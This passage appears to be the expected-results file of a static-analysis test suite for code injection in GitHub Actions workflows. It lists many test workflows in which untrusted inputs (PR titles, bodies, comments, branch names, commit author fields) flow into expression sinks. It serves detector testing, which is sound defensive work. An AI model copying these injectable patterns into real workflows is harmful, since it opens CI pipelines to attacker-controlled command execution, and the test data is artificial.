.github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | ${{ github.event.pull_request.title \|\| "foo" }} | .github/workflows/test12.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | ${{ github.event.changes.body.from }} | .github/workflows/test13.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | ${{ github.event.changes.title.from }} | .github/workflows/test13.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | ${{ github.event.changes.head.ref.from }} | .github/workflows/test13.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | ${{ toJson(github.event.changes) }} | .github/workflows/test13.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test14.yml:16:21:16:60 | steps.changed-files.outputs.files | .github/workflows/test14.yml:14:14:15:117 | echo "files=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_OUTPUT"\n | .github/workflows/test14.yml:16:21:16:60 | steps.changed-files.outputs.files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test14.yml:16:21:16:60 | steps.changed-files.outputs.files | ${{ steps.changed-files.outputs.files }} | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | .github/workflows/test14.yml:24:14:26:52 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "files=${FILES}" >> "$GITHUB_OUTPUT"\n | .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | ${{ steps.changed-files.outputs.files }} | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | .github/workflows/test14.yml:35:14:36:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | ${{ env.CHANGED-FILES }} | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | .github/workflows/test14.yml:45:14:47:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | ${{ env.CHANGED-FILES }} | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | .github/workflows/test15.yml:11:14:12:103 | echo "title=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_OUTPUT"\n | .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | ${{ steps.title.outputs.title }} | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | .github/workflows/test15.yml:18:14:20:53 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "title=$PR_TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | ${{ steps.title.outputs.title }} | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test15.yml:28:21:28:36 | env.TITLE | .github/workflows/test15.yml:26:14:27:100 | echo "TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:28:21:28:36 | env.TITLE | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test15.yml:28:21:28:36 | env.TITLE | ${{ env.TITLE }} | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test15.yml:36:21:36:36 | env.TITLE | .github/workflows/test15.yml:33:14:35:50 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "TITLE=$PR_TITLE" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:36:21:36:36 | env.TITLE | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test15.yml:36:21:36:36 | env.TITLE | ${{ env.TITLE }} | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | ${{ github.event.workflow_run.head_commit.author.name }} | .github/workflows/test16.yml:4:5:4:16 | workflow_run | workflow_run | +| .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | .github/workflows/test16.yml:125:20:125:75 | echo "value=$(git log -1 --pretty=%s)" >> $GITHUB_OUTPUT | .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | ${{ needs.build-demo.outputs.commit-message }} | .github/workflows/test16.yml:4:5:4:16 | workflow_run | workflow_run | +| .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | .github/workflows/test16.yml:26:15:33:12 | Uses Step | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | ${{ needs.setup.outputs.ref }} | .github/workflows/test16.yml:4:5:4:16 | workflow_run | workflow_run | +| .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | .github/workflows/test16.yml:38:15:45:12 | Uses Step | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | ${{ needs.setup.outputs.ref }} | .github/workflows/test16.yml:4:5:4:16 | workflow_run | workflow_run | +| .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | .github/workflows/test17.yml:14:13:22:10 | Uses Step: get-pr | .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | ${{ steps.get-pr.outputs.data }} | .github/workflows/test17.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | .github/workflows/test17.yml:30:13:39:10 | Uses Step: get-pr-details | .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | ${{ fromJson(steps.get-pr-details.outputs.data).head.ref }} | .github/workflows/test17.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | .github/workflows/test17.yml:49:13:55:10 | Uses Step: issues | .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | ${{ steps.issues.outputs.data }} | .github/workflows/test17.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | .github/workflows/test17.yml:60:13:68:10 | Uses Step: get-pull-request | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | ${{ fromJson(steps.get-pull-request.outputs.data).title }} | .github/workflows/test17.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | .github/workflows/test18.yml:8:9:16:6 | Uses Step: issues | .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | ${{ steps.issues.outputs.data }} | .github/workflows/test18.yml:2:3:2:19 | workflow_dispatch | workflow_dispatch | +| .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | .github/workflows/test19.yml:11:14:13:56 | HEAD_REF=$(gh pr view "${{ github.event.issue.number }}" --json headRefName -q '.headRefName')\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | ${{ steps.head_ref.outputs.head_ref}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | .github/workflows/test19.yml:16:14:18:50 | TITLE=$(gh pr view $PR_NUMBER --json title --jq .title)\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | .github/workflows/test19.yml:21:14:23:48 | BODY=$(gh pr view $PR_NUMBER --json body --jq .body)\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:26:14:28:56 | COMMENTS="$(gh pr view --repo ${{ github.repository }} "$PR_NUMBER" --json "body,comments" -q '.body, .comments[].body')"\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | .github/workflows/test19.yml:31:14:33:58 | CHANGED_FILES="$(gh pr view --repo ${{ github.repository }} ${{ needs.check-comment.outputs.pull_number }} --json files --jq '.files.[].path')"\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | ${{ steps.files.outputs.files}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | .github/workflows/test19.yml:36:14:38:52 | AUTHOR=$(gh pr view ${ORI_PR} -R ${REPO} --json author -q '.author.login') \necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | ${{ steps.author.outputs.author}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | .github/workflows/test19.yml:44:14:46:56 | HEAD_REF=$(gh api -H 'Accept: application/vnd.github+json' /repos/test/test/commits/${{ env.sui_sha }}/pulls --jq '.[].head.ref' \| head -n 1)\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | ${{ steps.head_ref.outputs.head_ref}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | .github/workflows/test19.yml:49:14:51:50 | TITLE=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | .github/workflows/test19.yml:54:14:56:48 | BODY=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:59:14:61:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | .github/workflows/test19.yml:64:14:66:58 | CHANGED_FILES=$(gh api /repos/test/test/pulls/${{PR_NUMBER}}/files --jq '.[].filename')\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | ${{ steps.files.outputs.files}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | .github/workflows/test19.yml:69:14:71:52 | AUTHOR=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".user.login")\necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | ${{ steps.author.outputs.author}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | .github/workflows/test19.yml:77:14:79:50 | TITLE=$(gh issue view "$ISSUE_NUMBER" --json title --jq '.title')\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | .github/workflows/test19.yml:82:14:84:48 | BODY=$(gh issue view -R ${GITHUB_REPOSITORY} ${ORIGINAL_ISSUE_NUMBER} --json title,body --jq '.body')\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:87:14:89:56 | COMMENTS=$(gh issue view "$ISSUE_NUMBER" --json comments --jq '.comments[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | .github/workflows/test19.yml:95:14:97:50 | TITLE=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | .github/workflows/test19.yml:100:14:102:48 | BODY=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:105:14:107:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:117:21:117:52 | steps.title1.outputs.title | .github/workflows/test19.yml:113:14:116:50 | DETAILS=$(gh pr view $PR_NUMBER --json "title,author,headRefName")\nTITLE=$(echo $DETAILS \| jq -r '.title')\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:117:21:117:52 | steps.title1.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:117:21:117:52 | steps.title1.outputs.title | ${{ steps.title1.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:123:21:123:52 | steps.title2.outputs.title | .github/workflows/test19.yml:119:14:122:50 | TITLE=$(gh pr view $PR_NUMBER --json "title,author,headRefName")\nTITLE=$(echo $TITLE \| jq -r '.title')\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:123:21:123:52 | steps.title2.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:123:21:123:52 | steps.title2.outputs.title | ${{ steps.title2.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:129:21:129:52 | steps.title3.outputs.title | .github/workflows/test19.yml:125:14:128:50 | TITLE=$(gh issue view "$ISSUE_NUMBER" --json title,author)\nTITLE=$(echo $TITLE \| jq -r '.title')\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:129:21:129:52 | steps.title3.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:129:21:129:52 | steps.title3.outputs.title | ${{ steps.title3.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test24.yml:19:17:19:50 | steps.parse.outputs.payload | .github/workflows/test24.yml:8:9:17:6 | Uses Step: parse | .github/workflows/test24.yml:19:17:19:50 | steps.parse.outputs.payload | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test24.yml:19:17:19:50 | steps.parse.outputs.payload | ${{ steps.parse.outputs.payload }} | .github/workflows/test24.yml:2:3:2:8 | issues | issues | +| .github/workflows/test25.yml:12:20:12:50 | steps.parse.outputs.data | .github/workflows/test25.yml:9:9:12:6 | Uses Step: parse | .github/workflows/test25.yml:12:20:12:50 | steps.parse.outputs.data | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test25.yml:12:20:12:50 | steps.parse.outputs.data | ${{ steps.parse.outputs.data }} | .github/workflows/test25.yml:3:5:3:10 | issues | issues | +| .github/workflows/test25.yml:13:20:13:58 | toJSON(steps.parse.outputs.data) | .github/workflows/test25.yml:9:9:12:6 | Uses Step: parse | .github/workflows/test25.yml:13:20:13:58 | toJSON(steps.parse.outputs.data) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test25.yml:13:20:13:58 | toJSON(steps.parse.outputs.data) | ${{ toJSON(steps.parse.outputs.data) }} | .github/workflows/test25.yml:3:5:3:10 | issues | issues | +| .github/workflows/test26.yml:28:20:28:50 | steps.parse.outputs.data | .github/workflows/test26.yml:20:11:20:140 | echo "body=$(gh issue view ${{ inputs.issue_number }} --repo ${{ github.repository }} --json body --jq '.body')" >> $GITHUB_OUTPUT | .github/workflows/test26.yml:28:20:28:50 | steps.parse.outputs.data | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test26.yml:28:20:28:50 | steps.parse.outputs.data | ${{ steps.parse.outputs.data }} | .github/workflows/test26.yml:4:3:4:19 | workflow_dispatch | workflow_dispatch | +| .github/workflows/test26.yml:29:20:29:58 | toJSON(steps.parse.outputs.data) | .github/workflows/test26.yml:20:11:20:140 | echo "body=$(gh issue view ${{ inputs.issue_number }} --repo ${{ github.repository }} --json body --jq '.body')" >> $GITHUB_OUTPUT | .github/workflows/test26.yml:29:20:29:58 | toJSON(steps.parse.outputs.data) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test26.yml:29:20:29:58 | toJSON(steps.parse.outputs.data) | ${{ toJSON(steps.parse.outputs.data) }} | .github/workflows/test26.yml:4:3:4:19 | workflow_dispatch | workflow_dispatch | +| .github/workflows/test27.yml:52:17:52:56 | needs.setup.outputs.chart-version | .github/workflows/test27.yml:35:9:41:6 | Uses Step | .github/workflows/test27.yml:52:17:52:56 | needs.setup.outputs.chart-version | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test27.yml:52:17:52:56 | needs.setup.outputs.chart-version | ${{ needs.setup.outputs.chart-version }} | .github/workflows/test27.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:20:20:20:62 | github.event['pull_request']['body'] | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | .github/workflows/test.yml:2:3:2:21 | pull_request_target | pull_request_target | +| .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | .github/workflows/untrusted_checkout1.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | ${{ steps.artifact.outputs.pr_number }} | .github/workflows/untrusted_checkout1.yml:2:3:2:21 | pull_request_target | pull_request_target | +| .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | ${{ github.event.workflow_run.head_commit.author.email }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | ${{ github.event.workflow_run.head_commit.author.name }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | ${{ github.event.workflow_run.head_commit.committer.email }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | ${{ github.event.workflow_run.head_commit.committer.name }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | 